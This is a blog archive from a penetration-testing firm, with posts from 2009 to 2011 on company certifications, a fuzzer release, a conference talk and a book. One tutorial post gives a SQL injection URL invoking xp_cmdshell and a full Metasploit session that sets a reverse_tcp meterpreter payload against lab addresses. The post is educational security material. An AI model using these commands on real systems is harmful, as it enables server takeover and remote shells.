SECFORCE | SECFORCE

Home : Blog

Archive for the ‘SECFORCE’ Category

	Proxyfuzz fuzzer RPM binary Thursday, September 22nd, 2011 Proxyfuzz is now available in RPM format for Fedora users. Petr Sklenar has created and uploaded the RPM version, available for download here. Source code and windows binaries can still be found in the security research section of our website. Proxyfuzz is a protocol agnostic fuzzer which randomly fuzzes network traffic following a man-in-the-middle approach. The tool is designed to randomly inject a number of fuzzing signatures to the data that goes through it. It is incredibly easy to set up and can be used to research any TCP and UDP protocol. Tags: Fuzzing, network protocol fuzzing, proxyfuzz, research, RPM Posted in Fuzzing, SECFORCE, Security research \| No Comments »
	SECFORCE is now CREST certified Monday, July 25th, 2011 As part of the SECFORCE commitment to ensuring the provision of high quality services, SECFORCE has now achieved CREST certification. This will further complement the strong existing methodology and work of ethics. SECFORCE is already recognised as one of the leading penetration testing service providers in both the UK and Europe with the ability to demonstrate expertise and professionalism to ensure clients are totally satisfied. CREST Penetration Testing “CREST is a not for profit organisation which brings a demonstrable level of expertise and professionalism to security and penetration testing market. The bar for entry is set very high to protect the interests of the buying community and provide a clear differentiator for professional testing companies. There are very few companies in the UK who can meet the requirements of CREST and those that do, like SECFORCE, have had to demonstrated the processes they utilise for testing are sound, they have adopted industry best practice in their approach to testing and they handle sensitive client information in an appropriate manner.” Ian Glover, President of CREST The addition of CREST certification will provide further reassurance and confidence to the many clients where SECFORCE has already built a strong working relationship. “We are really pleased that CREST certification has been achieved and view this as an important step forward in the continue enhancement of our service delivery” Rodrigo Marcos, Technical Services Director For more information about our CREST assessments and discover how we can benefit your organization, please visit our CREST penetration testing page. Tags: CREST, CREST security, penetration test, Penetration Testing, SECFORCE Posted in CREST, Penetration Testing, SECFORCE \| No Comments »
	SECFORCE invited to present at Athcon Saturday, June 18th, 2011 SECFORCE was invited to present at Athcon conference, held in Athens during 2nd and 3rd June 2011. AthCon is an annual IT security conference that takes place in Athens Greece designed to give a technical insight to the world of IT security. A realistic, practical view of current and evolving threats and security trends presented by top international security experts. SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features. The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements. You can download the slides from the talk from our security research area. Tags: Athcon, exploitation, metasploit, Penetration Testing, post-exploitation, presentations Posted in Penetration Testing, SECFORCE, Tools \| No Comments »
	SECFORCE achieves quality management ISO 9001 certification Wednesday, April 6th, 2011 SECFORCE has achieved recognition for its quality management systems with the award of ISO 9001:2008. The certification recognises the company’s commitment to quality management systems used in the delivery of IT security services to SECFORCE customers and to continuous improvement processes and procedures. For customers this achievement will enhance their confidence in the high quality of SECFORCE’s services and will guarantee a more efficient and effective business operation, increasing customer satisfaction. As quality is constantly measured and procedures ensure corrective actions are taken whenever defects occur, our clients will be benefited by an ever increasing excellent service. Certification was awarded by The British Assessment Bureau, a UKAS accredited authority, by a series of independent audits. Tags: client satisfaction, ISO9001, quality management, SECFORCE Posted in SECFORCE \| No Comments »
	Exploiting SQL injection vulnerabilities with Metasploit Thursday, January 27th, 2011 In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker. Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures: http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell ‘ping 192.168.1.64′;– If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module. The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester. It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above: msf > use windows/mssql/mssql_payload_sqli msf exploit(mssql_payload_sqli) > set GET_PATH http://192.168.1.66/ showproduct.asp?id=1;[SQLi];-- GET_PATH => http://192.168.1.66/ showproduct.asp?id=1;[SQLi];-- msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66 RHOST => 192.168.1.66 msf exploit(mssql_payload_sqli) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp PAYLOAD => windows/patchupmeterpreter/reverse_tcp msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64 LHOST => 192.168.1.64 msf exploit(mssql_payload_sqli) > set LPORT 80 LPORT => 80 msf exploit(mssql_payload_sqli) > exploit After the exploitation the attacker will get a meterpreter shell. SQL injection exploitation with Metasploit If you want to use this code you can download it from Secforce security tools repository. Tags: exploitation, metasploit, ms sql server, Penetration Testing, sql injection Posted in Penetration Testing, SECFORCE, SQL Server, Tools, Vulnerabilities, exploit, sql injection \| No Comments »
	Metasploit and SQL injection Monday, January 17th, 2011 SECFORCE has released a set of scripts for enhancing Metasploit functionality exploiting SQL injection vulnerabilities. This is particularly useful in two scenarios: When an attacker achieves command execution on a database via SQL injection, but he wants all the functionality offered by Metasploit. The attacker identifies that the backend SQL server is vulnerable to MS_09004 but has no credentials or direct access to the database. The scripts can be retrieved from our security research page. Tags: metasploit, MS09004, Penetration Testing, sql injection, Tools Posted in Penetration Testing, SECFORCE, Tools \| No Comments »
	SECFORCE has co-authored the book “SQL Injection Attacks and Defense” Tuesday, March 31st, 2009 SECFORCE has co-authored a book fully dedicated to SQL injection attacks and published by Syngess. This book targets developers, penetration testers and security professionals. It is entirely dedicated to SQL injection attacks and defense, and it is a standalone resource with all the necessary information about the topic. SQL injection is one of the most devastating vulnerabilities affecting web applications. This book provides penetration testing professionals with all the necessary information to discover and exploit this kind of vulnerabilities. Tags: book, penetration test, Penetration Testing, sql injection, SQL injection Attacks and Defense Posted in Penetration Testing, SECFORCE, Security Books \| No Comments »
	Hackers in your network are closer than they appear Thursday, January 22nd, 2009 Our marketing department did it again! This is what happens when marketing creatives and techies get together. From this… you get a monitor mirror with this design… and then you get the real thing: If you are one of our lucky clients, you will probably never look back again to check who is looking over your shoulder. If you are not then you don’t have the assurance of having the very best security consultants looking after your infrastructure and what is more important, you will need to keep looking back. SECFORCE is an IT security consultancy specialized in providing penetration testing and IT security consultancy. Have a look to our website if you need to protect business assets. Tags: hackers, marketing, monitor mirror, SECFORCE Posted in Penetration Testing, SECFORCE \| No Comments »